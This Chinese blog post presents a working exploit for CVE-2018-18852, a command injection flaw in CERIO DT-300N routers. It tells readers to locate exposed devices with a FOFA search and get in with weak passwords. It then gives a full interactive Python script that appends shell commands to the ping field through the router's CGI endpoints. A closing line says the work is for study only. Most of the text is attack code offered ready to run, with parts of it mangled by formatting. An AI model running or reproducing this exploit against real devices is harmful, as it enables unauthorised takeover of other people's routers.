CVE-2018-18852 简单利用
CERIO DT-300N是中国台湾智鼎资讯(CERIO)公司的一款无线路由器。CERIO DT-300N 1.1.6版本至1.1.12版本中存在操作命令注入漏洞。攻击者可利用该漏洞执行ping命令。
漏洞利用
查找具备漏洞版本的目标,这里利用FOFA搜索的 title="CERIO" 关键信息,然后找个弱口令登入进去。
编辑代码另存为ok.py(大佬代码如下)
#author:九世#time:2019/1/30
import requestsimport jsonimport base64
class Demo: def __init__(self,headers,url,payload,url2): self.headers=headers self.url=url self.payload=payload self.url2=url2
def requet(self): ver = 'DT-300N-NGS-M' ver2='DT-300N' version='' vurl='' rqt=requests.post(url=self.url,headers=self.headers,data=self.payload) nurl='' nersion='' if rqt.status_code==requests.codes.ok: print('[ ] Router version number is {}'.format(ver)) while True: rqt = requests.post(url=self.url, headers=self.headers, data=self.payload) nurl =rqt.url nersion =ver nary=json.loads(rqt.content) cmd = input('command:') payload = {'ip': '127.0.0.1;' 'echo "[[[";' cmd, 'pid': nary['pid'], 'Times': 1} self.command(self.url, headers, payload,nersion)
elif rqt.status_code==requests.codes.not_found: #判断状态码是否为404 print('[-] Router version number is not {}'.format(ver)) rqts=requests.post(url=self.url2,headers=headers,data=self.payload) if rqts.status_code==requests.codes.ok: print('[ ] Router version number is {}'.format(ver2)) while True: rqts = requests.post(url=self.url2, headers=headers, data=self.payload) version =ver2 vurl =rqts.url vary=json.loads(rqts.content) cmd=input('command:') payload = {'ip': '127.0.0.1;' 'echo "[[[";' cmd, 'pid': vary, 'Times': 1} self.command(self.url2,headers,payload,version) elif rqts.status_code==requests.codes.not_found: print('[-] Router version number is not {}'.format(ver2)) exit() elif rqts.status_code==requests.codes.unauthorized: print('[-] Auth is invalid, try other creds') exit()
def command(self,url,header,data,ver): rsv=requests.post(url=url,headers=header,data=data) if ver=='DT-300N': print(rsv.text.split('/html')[1]) else: print(rsv.text.split('[[[')[1])if __name__ == '__main__': print('[&]') print('[!] CERIO DT-300N-NGS-M\n[!] CERIO DT-300N') print('') t='' path='/cgi-bin/main.cgi?cgi=PING&mode=9' path2='/cgi-bin/Save.cgi?cgi=PING' user=input('host:').strip() ports=input('port:').strip() username=input('creds:').strip() creds=bytes(base64.b64encode(bytes(username,encoding='utf-8'))).decode('utf-8') if ports in '443': t ='https://' else: t ='http://'
urls=t user ':' ports path urls2=t user ':' ports path2 payload={'cgi':'PING','mode':9} headers={'content-type': 'application/json', 'Host': user, 'Accept-Encoding': 'gzip, deflate','Content-Length': '0', 'Connection': 'keep-alive', 'Authorization': 'Basic {}'.format(creds)} obj=Demo(headers=headers,payload=payload,url=urls,url2=urls2) obj.requet()运行命令
python3 ok.py
利用成功,可以返回当前用户信息
注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。
推荐文章++++